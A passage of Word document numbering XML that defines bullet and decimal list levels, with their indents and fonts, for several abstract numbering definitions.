      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E7D8E66C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46FCA16A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FBC661FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4FA85284">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E26606A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A2703B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F9080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1AF23539"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A4FCD83E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5300857E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A39652B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6A886068">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CFAEE7B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CBD06148">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6CB4D226">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A1D4B2EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B5342A64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E985BD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9CDE6A12">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D01A0F90">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F8698A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="03B4509E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="34E21522">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="11C07414">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A06A6AE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D4FA306C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="020CC52A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1EBE23AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AA18F7FA">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BD7A8DB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06BEF5D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DC30D7DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1B304616">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="51024C0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="86CA62C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2CA0600A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E93EA6C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F169DB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51AC8CC4">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B3763FCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BE4AA996">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="51BE7A3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7728BACC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C3B231BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B7967B62">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F5F09E50">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EDF0959A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="237D754B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51E89138">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8C60CD5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06DA2A3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7B96B620">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="774E792A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C1AEBA16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="59B4EA12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3440D32A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9D50A594">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24E112DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F37EDE5C"/>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259F6CBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CACE9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270900A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="40F46320">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3F9CA006">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FC4A712">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F4CCF7A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="84902A04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3E3E2AFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C01A565E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BFF838B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7930948E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="292481B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5BAC49C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="088AD098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0B063C3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="97EE2A62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="448C2F68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="00843F06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1B666942">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6B5C0F8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8C74AF62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="296054F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7D78CBCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AB7A1D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F2FEBE94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D01C44B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59D82FA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
